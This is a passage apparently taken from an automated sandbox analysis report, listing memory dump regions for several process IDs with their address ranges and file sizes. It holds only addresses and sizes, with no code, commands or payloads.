                                                                                                                                                                                                                                                      • memory/3672-311-0x0000000003520000-0x0000000003521000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3672-314-0x0000000002620000-0x0000000002621000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3672-192-0x00000000008B0000-0x00000000009FA000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                      • memory/3672-179-0x0000000002840000-0x0000000002841000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3672-306-0x0000000003520000-0x0000000003521000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3672-286-0x0000000002830000-0x0000000002831000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3672-236-0x0000000002850000-0x0000000002851000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3672-332-0x0000000002650000-0x0000000002651000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3672-282-0x0000000002870000-0x0000000002871000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3672-269-0x0000000002800000-0x0000000002801000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3672-273-0x0000000000400000-0x00000000007BB000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        3.7MB

                                                                                                                                                                                                                                                      • memory/3672-193-0x00000000008B0000-0x00000000009FA000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                      • memory/3672-260-0x0000000000400000-0x00000000007BB000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        3.7MB

                                                                                                                                                                                                                                                      • memory/3672-301-0x0000000002860000-0x0000000002861000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3672-316-0x00000000025D0000-0x00000000025D1000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3672-243-0x0000000000400000-0x00000000007BB000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        3.7MB

                                                                                                                                                                                                                                                      • memory/3672-194-0x00000000008B0000-0x00000000009FA000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                      • memory/3672-302-0x0000000003530000-0x0000000003531000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3672-141-0x00000000008B0000-0x00000000009FA000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                      • memory/3672-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/3672-198-0x00000000008B0000-0x00000000009FA000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                      • memory/3672-212-0x00000000008B0000-0x00000000009FA000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                      • memory/3672-326-0x00000000025F0000-0x00000000025F1000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3672-216-0x00000000008B0000-0x00000000009FA000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                      • memory/3672-222-0x00000000008B0000-0x00000000009FA000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                      • memory/3672-208-0x00000000008B0000-0x00000000009FA000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                      • memory/3672-204-0x00000000008B0000-0x00000000009FA000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                      • memory/3672-297-0x0000000002820000-0x0000000002821000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3672-229-0x00000000008B0000-0x00000000009FA000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                      • memory/3672-203-0x00000000008B0000-0x00000000009FA000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                      • memory/3712-230-0x0000000005D60000-0x0000000005D61000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3712-263-0x0000000005E40000-0x0000000005E41000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3712-214-0x0000000000880000-0x0000000000881000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3712-227-0x0000000006450000-0x0000000006451000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3712-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/3712-202-0x0000000077E10000-0x0000000077F9E000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        1.6MB

                                                                                                                                                                                                                                                      • memory/3712-246-0x0000000005DC0000-0x0000000005DC1000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3712-234-0x0000000005F50000-0x0000000005F51000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3788-441-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/3820-387-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/3832-123-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/3832-317-0x0000000002D19000-0x0000000002D45000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        176KB

                                                                                                                                                                                                                                                      • memory/3832-374-0x00000000071F2000-0x00000000071F3000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3832-371-0x00000000071F0000-0x00000000071F1000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/3832-328-0x00000000001C0000-0x00000000001F9000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        228KB

                                                                                                                                                                                                                                                      • memory/3844-245-0x0000000140000000-0x0000000140FFB000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        16.0MB

                                                                                                                                                                                                                                                      • memory/3844-239-0x00007FFD51DD0000-0x00007FFD51DD2000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                      • memory/3844-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/3912-647-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4100-462-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4104-262-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4180-259-0x0000000002690000-0x00000000026BC000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        176KB

                                                                                                                                                                                                                                                      • memory/4180-240-0x0000000002180000-0x00000000021AE000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        184KB

                                                                                                                                                                                                                                                      • memory/4180-250-0x0000000004AC0000-0x0000000004AC1000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4180-264-0x00000000007B0000-0x00000000007B1000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4180-292-0x00000000007B4000-0x00000000007B6000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                      • memory/4180-132-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4256-119-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4324-189-0x00000000002F0000-0x00000000002F1000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4324-167-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4372-330-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4464-335-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4520-451-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4548-659-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4588-124-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4632-404-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4680-367-0x0000022A3C0D0000-0x0000022A3C0D2000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                      • memory/4680-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4832-418-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5076-460-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5216-482-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5280-490-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5316-494-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5328-595-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5336-493-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5356-495-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5480-505-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5496-621-0x0000000000402998-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5532-707-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5592-518-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5716-526-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5820-635-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5832-538-0x0000000000000000-mapping.dmp